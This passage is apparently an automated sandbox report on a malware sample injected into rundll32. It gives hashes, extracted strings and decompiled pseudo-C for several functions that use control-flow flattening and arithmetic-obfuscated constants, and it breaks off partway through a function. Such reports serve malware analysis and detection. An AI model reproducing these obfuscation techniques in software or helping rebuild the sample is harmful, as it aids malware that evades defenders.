Opcode Fuzzy Hash: ade015ae09c36ffb3688ddc20d57e637bb2c097e9389b75e062ef95baad5f206
Instruction Fuzzy Hash: 395154B15083419FD348CF25C58AA1BBBE0FBC4708F501A1CF5A69A2A0D3B5DA49CF97

Uniqueness

Uniqueness Score: -1.00%

Function 001AF3B5, Relevance: 7.9, Strings: 6, Instructions: 352
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E001AF3B5(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v12;
				intOrPtr _v16;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				unsigned int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t311;
				signed int _t368;
				signed int* _t370;
				void* _t372;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t432;
				signed int* _t435;
				void* _t438;

				_t431 = _a8;
				_t370 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t311);
				_v16 = 0x6a5a5f;
				_t435 =  &(( &_v180)[5]);
				asm("stosd");
				_t372 = 0x37961ba0;
				asm("stosd");
				asm("stosd");
				_v172 = 0xd11d;
				_v172 = _v172 << 0xa;
				_v172 = _v172 + 0xfffff63f;
				_t420 = 9;
				_v172 = _v172 / _t420;
				_v172 = _v172 ^ 0x005cdcdc;
				_v80 = 0x7f86;
				_t421 = 0x19;
				_v80 = _v80 / _t421;
				_v80 = _v80 ^ 0x00003ead;
				_v124 = 0x1032;
				_t422 = 0x31;
				_v124 = _v124 / _t422;
				_v124 = _v124 | 0xef971e72;
				_v124 = _v124 ^ 0xef9764e2;
				_v88 = 0xc1ea;
				_v88 = _v88 ^ 0x979ca812;
				_v88 = _v88 ^ 0x979c5ffb;
				_v96 = 0x54ee;
				_v96 = _v96 << 8;
				_v96 = _v96 ^ 0x0054c254;
				_v180 = 0xd087;
				_v180 = _v180 ^ 0x59d46990;
				_t423 = 0xd;
				_v180 = _v180 / _t423;
				_t432 = 0x34;
				_v180 = _v180 / _t432;
				_v180 = _v180 ^ 0x002202bc;
				_v132 = 0x3b1a;
				_v132 = _v132 << 0xe;
				_t424 = 0x28;
				_v132 = _v132 / _t424;
				_v132 = _v132 ^ 0x005ef2d6;
				_v104 = 0xc641;
				_t425 = 7;
				_v104 = _v104 / _t425;
				_v104 = _v104 ^ 0x000065d5;
				_v76 = 0x7ab;
				_v76 = _v76 ^ 0x4ce0fc6c;
				_v76 = _v76 ^ 0x4ce08288;
				_v84 = 0xfefe;
				_v84 = _v84 + 0xffff7c94;
				_v84 = _v84 ^ 0x00001541;
				_v140 = 0x7f84;
				_v140 = _v140 | 0x4b8568cb;
				_v140 = _v140 ^ 0x9650e588;
				_v140 = _v140 ^ 0xddd58cd0;
				_v112 = 0x8bdc;
				_v112 = _v112 ^ 0x188c9e15;
				_v112 = _v112 ^ 0x57653813;
				_v112 = _v112 ^ 0x4fe9526e;
				_v152 = 0x7103;
				_t426 = 0x16;
				_v152 = _v152 / _t426;
				_v152 = _v152 + 0x71cd;
				_v152 = _v152 << 0xd;
				_v152 = _v152 ^ 0x0ede3f63;
				_v168 = 0x6706;
				_v168 = _v168 >> 4;
				_t427 = 0x5c;
				_v168 = _v168 * 0x42;
				_v168 = _v168 ^ 0x36591758;
				_v168 = _v168 ^ 0x3658a240;
				_v160 = 0x482;
				_v160 = _v160 << 0xc;
				_v160 = _v160 / _t427;
				_v160 = _v160 << 1;
				_v160 = _v160 ^ 0x0001f47e;
				_v100 = 0x7495;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0x001d3afe;
				_v144 = 0x9dbd;
				_v144 = _v144 >> 3;
				_v144 = _v144 / _t432;
				_v144 = _v144 ^ 0x000059ff;
				_v68 = 0x84ca;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00082e42;
				_v128 = 0x7916;
				_v128 = _v128 + 0x2b05;
				_v128 = _v128 ^ 0xe1998e72;
				_v128 = _v128 ^ 0xe1992c62;
				_v120 = 0xe946;
				_v120 = _v120 + 0xbb27;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0x0003041a;
				_v136 = 0xb1ad;
				_t428 = 0x2f;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 / _t428;
				_v136 = _v136 ^ 0x0000fb6b;
				_v116 = 0xdc58;
				_v116 = _v116 | 0xd4c8ac44;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0x647e7301;
				_v72 = 0xb8af;
				_v72 = _v72 * 0x45;
				_v72 = _v72 ^ 0x00319874;
				_v164 = 0xa3;
				_v164 = _v164 + 0xffff67c9;
				_v164 = _v164 | 0xe199b05b;
				_v164 = _v164 + 0xffff81e1;
				_v164 = _v164 ^ 0xffff3813;
				_v64 = 0xc10a;
				_v64 = _v64 | 0x41072eb0;
				_v64 = _v64 ^ 0x4107edf9;
				_v92 = 0xba30;
				_v92 = _v92 | 0x6049f892;
				_v92 = _v92 ^ 0x60499e7e;
				_v176 = 0x47c3;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x8f8a29cf;
				_v176 = _v176 << 0xb;
				_v176 = _v176 ^ 0x5109efc4;
				_v148 = 0xda1;
				_t429 = 0x4c;
				_v148 = _v148 * 0x57;
				_v148 = _v148 + 0xa496;
				_v148 = _v148 / _t429;
				_v148 = _v148 ^ 0x00002f39;
				_v108 = 0xdb7a;
				_v108 = _v108 + 0xf4b0;
				_v108 = _v108 * 0x68;
				_v108 = _v108 ^ 0x00bca527;
				_v156 = 0xff6c;
				_v156 = _v156 ^ 0xee25b214;
				_v156 = _v156 >> 0xa;
				_v156 = _v156 + 0x8d5b;
				_v156 = _v156 ^ 0x003c282f;
				goto L1;
				do {
					while(1) {
						L1:
						_t438 = _t372 - 0x2a7fbf86;
						if(_t438 > 0) {
							break;
						}
						if(_t438 == 0) {
							E001A25A5( *((intOrPtr*)(_t431 + 0x10)), _v100, _v144,  &_v60, _v68);
							_t435 =  &(_t435[3]);
							_t372 = 0x13daeaf7;
							continue;
						} else {
							if(_t372 == 0x1aec3e5) {
								_t370[1] = E001A510E(_t431);
								_t372 = 0x39a008cf;
								continue;
							} else {
								if(_t372 == 0x6ac97f0) {
									E001A25A5( *((intOrPtr*)(_t431 + 0xc)), _v152, _v168,  &_v60, _v160);
									_t435 =  &(_t435[3]);
									_t372 = 0x2a7fbf86;
									continue;
								} else {
									if(_t372 == 0xf58ea71) {
										E001A25A5( *((intOrPtr*)(_t431 + 8)), _v84, _v140,  &_v60, _v112);
										_t435 =  &(_t435[3]);
										_t372 = 0x6ac97f0;
										continue;
									} else {
										if(_t372 == 0x13daeaf7) {
											E001A25A5( *((intOrPtr*)(_t431 + 0x14)), _v128, _v120,  &_v60, _v136);
											_t435 =  &(_t435[3]);
											_t372 = 0x309687df;
											continue;
										} else {
											if(_t372 == 0x181c43c1) {
												E001B4A77(_v64, _v92, __eflags, _t431 + 0x20,  &_v60, _v176);
												_t435 =  &(_t435[3]);
												_t372 = 0x33dbaae4;
												continue;
											} else {
												_t444 = _t372 - 0x2411e5be;
												if(_t372 != 0x2411e5be) {
													goto L26;
												} else {
													E001B4A77(_v132, _v104, _t444, _t431,  &_v60, _v76);
													_t435 =  &(_t435[3]);
													_t372 = 0xf58ea71;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags =  *_t370;
						_t310 =  *_t370 != 0;
						__eflags = _t310;
						return 0 | _t310;
					}
					__eflags = _t372 - 0x309687df;
					if(__eflags == 0) {
						E001B4A77(_v116, _v72, __eflags, _t431 + 0x18,  &_v60, _v164);
						_t435 =  &(_t435[3]);
						_t372 = 0x181c43c1;
						goto L26;
					} else {
						__eflags = _t372 - 0x33dbaae4;
						if(_t372 == 0x33dbaae4) {
							_t304 =  &_v156; // 0x3c282f
							E001A25A5( *((intOrPtr*)(_t431 + 0x28)), _v148, _v108,  &_v60,  *_t304);
						} else {
							__eflags = _t372 - 0x37961ba0;
							if(__eflags == 0) {
								 *_t370 = 0;
								_t372 = 0x1aec3e5;
								_t370[1] = 0;
								goto L1;
							} else {
								__eflags = _t372 - 0x39a008cf;
								if(_t372 == 0x39a008cf) {
									_push(_t372);
									_push(_t372);
									_t368 = E001B922B(_t370[1]);
									_t435 =  &(_t435[3]);
									 *_t370 = _t368;
									__eflags = _t368;
									if(__eflags != 0) {
										_t372 = 0x39d55f5a;
										goto L1;
									}
								} else {
									__eflags = _t372 - 0x39d55f5a;
									if(_t372 != 0x39d55f5a) {
										goto L26;
									} else {
										E001BC395(_v96,  &_v60, _t370, _v180);
										_t372 = 0x2411e5be;
										goto L1;
									}
								}
							}
						}
					}
					goto L29;
					L26:
					__eflags = _t372 - 0x33970593;
				} while (__eflags != 0);
				goto L29;
			}

0x001af3be
0x001af3c5
0x001af3c8
0x001af3cf
0x001af3d0
0x001af3d7
0x001af3d8
0x001af3d9
0x001af3de
0x001af3f2
0x001af3f5
0x001af3f8
0x001af3ff
0x001af400
0x001af401
0x001af409
0x001af40e
0x001af41a
0x001af41f
0x001af425
0x001af42d
0x001af439
0x001af43e
0x001af444
0x001af44c
0x001af458
0x001af45d
0x001af463
0x001af46b
0x001af473
0x001af47b
0x001af483
0x001af48b
0x001af493
0x001af498
0x001af4a0
0x001af4a8
0x001af4b4
0x001af4b9
0x001af4c3
0x001af4c8
0x001af4ce
0x001af4d6
0x001af4de
0x001af4e7
0x001af4ec
0x001af4f0
0x001af4fa
0x001af506
0x001af50b
0x001af50f
0x001af517
0x001af51f
0x001af527
0x001af52f
0x001af537
0x001af53f
0x001af547
0x001af54f
0x001af557
0x001af55f
0x001af567
0x001af56f
0x001af577
0x001af57f
0x001af587
0x001af595
0x001af59a
0x001af59e
0x001af5a6
0x001af5ab
0x001af5b3
0x001af5bb
0x001af5c7
0x001af5ca
0x001af5ce
0x001af5d6
0x001af5de
0x001af5e6
0x001af5f3
0x001af5f7
0x001af5fb
0x001af603
0x001af60b
0x001af610
0x001af618
0x001af620
0x001af62d
0x001af631
0x001af639
0x001af644
0x001af64c
0x001af657
0x001af65f
0x001af667
0x001af66f
0x001af677
0x001af67f
0x001af687
0x001af68b
0x001af693
0x001af6a0
0x001af6a1
0x001af6ab
0x001af6af
0x001af6b7
0x001af6bf
0x001af6c7
0x001af6cc
0x001af6d4
0x001af6e1
0x001af6e7
0x001af6f4
0x001af6fc
0x001af704
0x001af70c
0x001af714
0x001af71c
0x001af727
0x001af732
0x001af73d
0x001af745
0x001af74d
0x001af755
0x001af75d
0x001af762
0x001af76a
0x001af76f
0x001af777
0x001af786
0x001af787
0x001af78b
0x001af799
0x001af79d
0x001af7a5
0x001af7ad
0x001af7ba
0x001af7be
0x001af7c6
0x001af7ce
0x001af7d6
0x001af7db
0x001af7e3
0x001af7eb
0x001af7ed
0x001af7ed
0x001af7ed
0x001af7ed
0x001af7ef
0x00000000
0x00000000
0x001af7f5
0x001af932
0x001af937
0x001af93a
0x00000000
0x001af7fb
0x001af801
0x001af90b
0x001af90e
0x00000000
0x001af807
0x001af80d
0x001af8f5
0x001af8fa
0x001af8fd
0x00000000
0x001af813
0x001af819
0x001af8cc
0x001af8d1
0x001af8d4
0x00000000
0x001af81f
0x001af825
0x001af8a3
0x001af8a8
0x001af8ab
0x00000000
0x001af827
0x001af82d
0x001af87a
0x001af87f
0x001af882
0x00000000
0x001af82f
0x001af82f
0x001af835
0x00000000
0x001af83b
0x001af850
0x001af855
0x001af858
0x00000000
0x001af858
0x001af835
0x001af82d
0x001af825
0x001af819
0x001af80d
0x001af801
0x001afa2a
0x001afa2c
0x001afa31
0x001afa31
0x001afa3b
0x001afa3b
0x001af944
0x001af94a
0x001af9f0
0x001af9f5
0x001af9f8
0x00000000
0x001af950
0x001af950
0x001af956
0x001afa0b
0x001afa22
0x001af95c
0x001af95c
0x001af962
0x001af9c6
0x001af9c8
0x001af9cd
0x00000000
0x001af964
0x001af964
0x001af96a
0x001af9a9
0x001af9aa
0x001af9ae
0x001af9b3
0x001af9b6
0x001af9b8
0x001af9ba
0x001af9bc
0x00000000
0x001af9bc
0x001af96c
0x001af96c
0x001af972
0x00000000
0x001af978
0x001af988
0x001af98f
0x00000000
0x001af98f
0x001af972
0x001af96a
0x001af962
0x001af956
0x00000000
0x001af9fd
0x001af9fd
0x001af9fd
0x00000000

Strings

T, xrefs: 001AF48B
F, xrefs: 001AF677
/(<, xrefs: 001AFA0B
nRO, xrefs: 001AF57F
9/, xrefs: 001AF79D
_Zj, xrefs: 001AF3DE

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /(<$9/$F$_Zj$nRO$T
API String ID: 0-1423594312
Opcode ID: 286ca19ab315de00fc12af4b53edb74615a731587baed84738ad96da88cc1a9e
Instruction ID: 671afe47e79e289eed71318b9a0b869fdf796e50ba049d38821309f64071e39f
Opcode Fuzzy Hash: 286ca19ab315de00fc12af4b53edb74615a731587baed84738ad96da88cc1a9e
Instruction Fuzzy Hash: 03F147755083819FE368CF65C48995BFBE1BBC4358F108A2EF196862A0D7B4D949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001A5742, Relevance: 7.7, Strings: 6, Instructions: 247
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001A5742(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* __edi;
				void* __ebp;
				void* _t232;
				intOrPtr _t233;
				intOrPtr _t235;
				intOrPtr _t241;
				intOrPtr _t242;
				intOrPtr _t243;
				intOrPtr* _t244;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr _t283;
				void* _t284;
				intOrPtr _t287;
				signed int* _t288;

				_t288 =  &_v96;
				_v12 = 0x474011;
				_v8 = 0x414c1d;
				_t244 = __edx;
				_t283 = 0;
				_v4 = 0;
				_v28 = 0x67d2;
				_t287 = __ecx;
				_t284 = 0x2b544fa7;
				_t246 = 0x79;
				_v28 = _v28 / _t246;
				_v28 = _v28 ^ 0x000066fd;
				_v92 = 0xc867;
				_t247 = 3;
				_v92 = _v92 / _t247;
				_v92 = _v92 | 0x11a3be64;
				_v92 = _v92 + 0x212b;
				_v92 = _v92 ^ 0x11a44bde;
				_v32 = 0xc098;
				_v32 = _v32 >> 0x10;
				_v32 = _v32 ^ 0x00001389;
				_v68 = 0xf3de;
				_v68 = _v68 | 0x7c489c07;
				_t248 = 0x11;
				_v68 = _v68 * 0x62;
				_v68 = _v68 ^ 0x93f1b12c;
				_v44 = 0x27a0;
				_v44 = _v44 << 0xa;
				_v44 = _v44 / _t248;
				_v44 = _v44 ^ 0x00090b27;
				_v76 = 0xa912;
				_v76 = _v76 >> 9;
				_v76 = _v76 ^ 0xb8cc95f3;
				_t249 = 0x45;
				_v76 = _v76 / _t249;
				_v76 = _v76 ^ 0x02adddff;
				_v48 = 0x179e;
				_v48 = _v48 + 0x8c02;
				_t250 = 0x4b;
				_v48 = _v48 * 0x71;
				_v48 = _v48 ^ 0x00486bb8;
				_v72 = 0xb5da;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xffffcbc6;
				_v72 = _v72 ^ 0xffff8f6a;
				_v36 = 0xf7ec;
				_v36 = _v36 + 0x2021;
				_v36 = _v36 ^ 0x000156ac;
				_v96 = 0x1050;
				_v96 = _v96 >> 3;
				_v96 = _v96 | 0xa8cf3f1a;
				_v96 = _v96 * 0x5f;
				_v96 = _v96 ^ 0xa4e81556;
				_v60 = 0x5f44;
				_v60 = _v60 ^ 0x70deb30f;
				_v60 = _v60 / _t250;
				_v60 = _v60 ^ 0x018118ef;
				_v88 = 0x8004;
				_t251 = 0x4d;
				_v88 = _v88 / _t251;
				_v88 = _v88 | 0x3fdf4b97;
				_v88 = _v88 ^ 0x3fdf3149;
				_v64 = 0x8766;
				_v64 = _v64 >> 7;
				_v64 = _v64 + 0xffffe4f8;
				_v64 = _v64 ^ 0xffffb143;
				_v20 = 0xf95a;
				_t252 = 0x56;
				_v20 = _v20 / _t252;
				_v20 = _v20 ^ 0x00004e62;
				_v24 = 0x629a;
				_t253 = 0x2f;
				_v24 = _v24 * 0x35;
				_v24 = _v24 ^ 0x00143780;
				_v80 = 0x9c1d;
				_v80 = _v80 * 0x6b;
				_v80 = _v80 + 0xf0e1;
				_v80 = _v80 << 6;
				_v80 = _v80 ^ 0x108c5402;
				_v52 = 0x5302;
				_v52 = _v52 << 4;
				_v52 = _v52 + 0xfffff784;
				_v52 = _v52 ^ 0x00050462;
				_v56 = 0x7042;
				_v56 = _v56 ^ 0xabf60a6d;
				_v56 = _v56 / _t253;
				_v56 = _v56 ^ 0x03a8dd05;
				_v84 = 0xb263;
				_v84 = _v84 * 0x75;
				_v84 = _v84 << 2;
				_v84 = _v84 + 0xae13;
				_v84 = _v84 ^ 0x0146fab0;
				_v40 = 0xc24;
				_v40 = _v40 + 0xffffa127;
				_v40 = _v40 | 0x3c999bfc;
				_v40 = _v40 ^ 0xffffb592;
				_v16 = 0x74b4;
				_v16 = _v16 ^ 0x64626fff;
				_v16 = _v16 ^ 0x646231f2;
				while(1) {
					L1:
					_t232 = 0x1bfacda6;
					while(1) {
						L2:
						_t254 = 0x3332e500;
						do {
							L3:
							while(_t284 != 0x3797d51) {
								if(_t284 == 0xd3e1028) {
									E001A693A(_v80, _v52,  *((intOrPtr*)(_t283 + 0x2c)), _v56, _v84);
									_t288 =  &(_t288[3]);
									_t284 = 0x1efdcaf8;
									while(1) {
										L1:
										_t232 = 0x1bfacda6;
										L2:
										_t254 = 0x3332e500;
										goto L3;
									}
								}
								if(_t284 == _t232) {
									_t235 = E001AFA3C(_v60, _v88, _t254, _v64, 0x1000884a, _v20, _t254, _t283, _t254, _t254, _v24);
									_t288 =  &(_t288[9]);
									 *((intOrPtr*)(_t283 + 0x14)) = _t235;
									__eflags = _t235;
									_t254 = 0x3332e500;
									_t232 = 0x1bfacda6;
									_t284 =  !=  ? 0x3332e500 : 0xd3e1028;
									continue;
								}
								if(_t284 == 0x1efdcaf8) {
									return E001AE380(_v40, _t283, _v16);
								}
								if(_t284 != 0x2b544fa7) {
									if(_t284 == 0x30403f1a) {
										_t242 = E001B6AB9(_v72,  *((intOrPtr*)(_t283 + 0x2c)), _v36, _v96);
										_t288 =  &(_t288[2]);
										 *((intOrPtr*)(_t283 + 0x18)) = _t242;
										__eflags = _t242;
										_t232 = 0x1bfacda6;
										_t284 =  !=  ? 0x1bfacda6 : 0xd3e1028;
										goto L2;
									} else {
										if(_t284 == _t254) {
											 *((intOrPtr*)(_t283 + 0x1c)) = _t287;
											_t243 =  *0x10020718;
											 *((intOrPtr*)(_t283 + 8)) = _t243;
											 *0x10020718 = _t283;
											return _t243;
										}
										goto L19;
									}
									L22:
									return _t241;
								}
								_push(_t254);
								_push(_t254);
								_t241 = E001B922B(0x38);
								_t283 = _t241;
								_t288 =  &(_t288[3]);
								__eflags = _t283;
								if(__eflags != 0) {
									_t284 = 0x3797d51;
									while(1) {
										L1:
										_t232 = 0x1bfacda6;
										goto L2;
									}
								}
								goto L22;
							}
							_push(_v48);
							_t233 = E001A4DB8(_v44, _v76, _t283, _t287, __eflags, _t254,  *((intOrPtr*)(_t244 + 4)),  *_t244);
							_t288 =  &(_t288[4]);
							 *((intOrPtr*)(_t283 + 0x2c)) = _t233;
							__eflags = _t233;
							if(__eflags == 0) {
								_t284 = 0x1efdcaf8;
								_t232 = 0x1bfacda6;
								_t254 = 0x3332e500;
								goto L19;
							} else {
								_t284 = 0x30403f1a;
								goto L1;
							}
							goto L22;
							L19:
							__eflags = _t284 - 0x1a15e16d;
						} while (__eflags != 0);
						return _t232;
					}
				}
			}

0x001a5742
0x001a5745
0x001a574d
0x001a5759
0x001a575b
0x001a575d
0x001a5763
0x001a576b
0x001a5771
0x001a5778
0x001a577d
0x001a5783
0x001a578b
0x001a5797
0x001a579c
0x001a57a2
0x001a57aa
0x001a57b2
0x001a57ba
0x001a57c2
0x001a57c7
0x001a57cf
0x001a57d7
0x001a57e4
0x001a57e7
0x001a57eb
0x001a57f3
0x001a57fb
0x001a5808
0x001a580c
0x001a5814
0x001a581c
0x001a5821
0x001a582d
0x001a5832
0x001a5838
0x001a5840
0x001a5848
0x001a5855
0x001a5856
0x001a585a
0x001a5862
0x001a586a
0x001a586f
0x001a5877
0x001a587f
0x001a5887
0x001a588f
0x001a5897
0x001a589f
0x001a58a4
0x001a58b1
0x001a58b5
0x001a58bd
0x001a58c5
0x001a58d3
0x001a58d9
0x001a58e1
0x001a58ef
0x001a58f4
0x001a58fa
0x001a5902
0x001a590a
0x001a5912
0x001a5917
0x001a591f
0x001a5927
0x001a5933
0x001a5938
0x001a593e
0x001a5946
0x001a5953
0x001a5954
0x001a5958
0x001a5960
0x001a596d
0x001a5971
0x001a5979
0x001a597e
0x001a5986
0x001a598e
0x001a5993
0x001a599b
0x001a59a3
0x001a59ab
0x001a59b9
0x001a59bd
0x001a59c5
0x001a59d2
0x001a59d6
0x001a59db
0x001a59e3
0x001a59eb
0x001a59f3
0x001a59fb
0x001a5a03
0x001a5a0b
0x001a5a13
0x001a5a1b
0x001a5a23
0x001a5a23
0x001a5a23
0x001a5a28
0x001a5a28
0x001a5a28
0x001a5a2d
0x00000000
0x001a5a2d
0x001a5a3f
0x001a5b3a
0x001a5b3f
0x001a5b42
0x001a5a23
0x001a5a23
0x001a5a23
0x001a5a28
0x001a5a28
0x00000000
0x001a5a28
0x001a5a23
0x001a5a47
0x001a5b03
0x001a5b08
0x001a5b0b
0x001a5b0e
0x001a5b15
0x001a5b1a
0x001a5b1f
0x00000000
0x001a5b1f
0x001a5a53
0x00000000
0x001a5ba3
0x001a5a5f
0x001a5a67
0x001a5a96
0x001a5a9b
0x001a5a9e
0x001a5aa1
0x001a5aa8
0x001a5aad
0x00000000
0x001a5a69
0x001a5a6b
0x001a5a71
0x001a5a74
0x001a5a79
0x001a5a7c
0x00000000
0x001a5a7c
0x00000000
0x001a5a6b
0x001a5bab
0x001a5bab
0x001a5bab
0x001a5ac5
0x001a5ac6
0x001a5ac9
0x001a5ace
0x001a5ad0
0x001a5ad3
0x001a5ad5
0x001a5adb
0x001a5a23
0x001a5a23
0x001a5a23
0x00000000
0x001a5a23
0x001a5a23
0x00000000
0x001a5ad5
0x001a5b4c
0x001a5b5e
0x001a5b63
0x001a5b66
0x001a5b69
0x001a5b6b
0x001a5b77
0x001a5b7c
0x001a5b81
0x00000000
0x001a5b6d
0x001a5b6d
0x00000000
0x001a5b6d
0x00000000
0x001a5b86
0x001a5b86
0x001a5b86
0x00000000
0x001a5a2d
0x001a5a28

Strings

D_, xrefs: 001A58BD
+!, xrefs: 001A57AA
Bp, xrefs: 001A59A3
es-EC, xrefs: 001A5A74, 001A5A7C
bN, xrefs: 001A593E
! , xrefs: 001A5887

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ! $+!$Bp$D_$bN$es-EC
API String ID: 0-2964705823
Opcode ID: 32feb7f54922f6ae31b83bcd6bcad369ea6375b76b549f9c553a9da8bafe1893
Instruction ID: 3a61840beb9693ff54dcf65eb9e72262b79f4f7c038b4a4967acf18880010614
Opcode Fuzzy Hash: 32feb7f54922f6ae31b83bcd6bcad369ea6375b76b549f9c553a9da8bafe1893
Instruction Fuzzy Hash: C5B143B69087419FD348CF25C48A90BFBF2BBC5384F108A1DF5959B2A0D7B5C9498F82

Uniqueness

Uniqueness Score: -1.00%

Function 001A510E, Relevance: 7.7, Strings: 6, Instructions: 196
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E001A510E(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t161;
				void* _t162;
				void* _t165;
				void* _t168;
				void* _t173;
				void* _t176;
				void* _t177;
				void* _t178;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t184;
				void* _t199;
				void* _t200;
				signed int* _t202;
				void* _t205;

				_t202 =  &_v80;
				_v16 = 0x72fa2;
				asm("stosd");
				_t178 = __ecx;
				_t180 = 0xa;
				asm("stosd");
				_t200 = 0x2b4db5ec;
				asm("stosd");
				_v40 = 0x891b;
				_t199 = 0;
				_v40 = _v40 / _t180;
				_t181 = 0x6c;
				_v40 = _v40 * 0x68;
				_v40 = _v40 ^ 0x0005e3a3;
				_v44 = 0x9655;
				_v44 = _v44 * 0xf;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x19df57eb;
				_v72 = 0xbd5a;
				_v72 = _v72 + 0xffff8364;
				_v72 = _v72 << 0x10;
				_v72 = _v72 ^ 0x40be2127;
				_v80 = 0xa978;
				_v80 = _v80 >> 2;
				_v80 = _v80 * 0x4d;
				_v80 = _v80 + 0xffffa5df;
				_v80 = _v80 ^ 0x000c0c91;
				_v48 = 0xafca;
				_v48 = _v48 / _t181;
				_t182 = 0x1b;
				_v48 = _v48 / _t182;
				_v48 = _v48 ^ 0x00007bb0;
				_v76 = 0xd3be;
				_v76 = _v76 + 0xaf94;
				_v76 = _v76 * 0x7a;
				_v76 = _v76 + 0xffff3809;
				_v76 = _v76 ^ 0x00b7df19;
				_v32 = 0x247d;
				_v32 = _v32 ^ 0xa5bfd644;
				_v32 = _v32 ^ 0xa5bfe9a1;
				_v60 = 0x2253;
				_v60 = _v60 << 0xe;
				_v60 = _v60 + 0x5dbf;
				_v60 = _v60 ^ 0x089505e9;
				_v64 = 0x9677;
				_v64 = _v64 + 0xffff4df0;
				_v64 = _v64 * 0x66;
				_v64 = _v64 ^ 0xfff55b5e;
				_v68 = 0xa3c;
				_v68 = _v68 * 0xf;
				_v68 = _v68 >> 0x10;
				_v68 = _v68 ^ 0x00004caf;
				_v52 = 0xdccc;
				_v52 = _v52 << 0xa;
				_v52 = _v52 * 3;
				_v52 = _v52 ^ 0x0a59f928;
				_v56 = 0x15b5;
				_t183 = 0x30;
				_v56 = _v56 / _t183;
				_v56 = _v56 ^ 0xfaaf40a2;
				_v56 = _v56 ^ 0xfaaf569d;
				_v36 = 0x3648;
				_v36 = _v36 << 2;
				_v36 = _v36 >> 4;
				_v36 = _v36 ^ 0x00002d3b;
				_v28 = 0x3990;
				_v28 = _v28 | 0x7bef7c0b;
				_v28 = _v28 ^ 0x7bef5b9b;
				_v20 = 0xfcb4;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x00002222;
				_v24 = 0xa0;
				_v24 = _v24 >> 9;
				_v24 = _v24 ^ 0x00005568;
				goto L1;
				do {
					while(1) {
						L1:
						_t205 = _t200 - 0x2b4db5ec;
						if(_t205 > 0) {
							break;
						}
						if(_t205 == 0) {
							_t200 = 0x2f3cb019;
							continue;
						} else {
							if(_t200 == 0x3c46948) {
								_push(_t184);
								_t168 = E001A56BA();
								_t202 =  &(_t202[1]);
								_t200 = 0x1382179b;
								_t199 = _t199 + _t168;
								continue;
							} else {
								if(_t200 == 0xe2325b7) {
									_push(_v20);
									_t199 = _t199 + E001A56BA();
								} else {
									if(_t200 == 0x1382179b) {
										_push(_t184);
										_t173 = E001A56BA();
										_t202 =  &(_t202[1]);
										_t200 = 0x3a1fb840;
										_t199 = _t199 + _t173;
										continue;
									} else {
										if(_t200 != 0x25aa6a95) {
											goto L19;
										} else {
											_push(_t184);
											_t176 = E001A56BA();
											_t202 =  &(_t202[1]);
											_t200 = 0x2f4090ca;
											_t199 = _t199 + _t176;
											continue;
										}
									}
								}
							}
						}
						L22:
						return _t199;
					}
					if(_t200 == 0x2f172a96) {
						_t184 = _t178 + 0x20;
						_t161 = E001B9B74(_t184, _v36, _v28);
						_t202 =  &(_t202[1]);
						_t200 = 0xe2325b7;
						_t199 = _t199 + _t161;
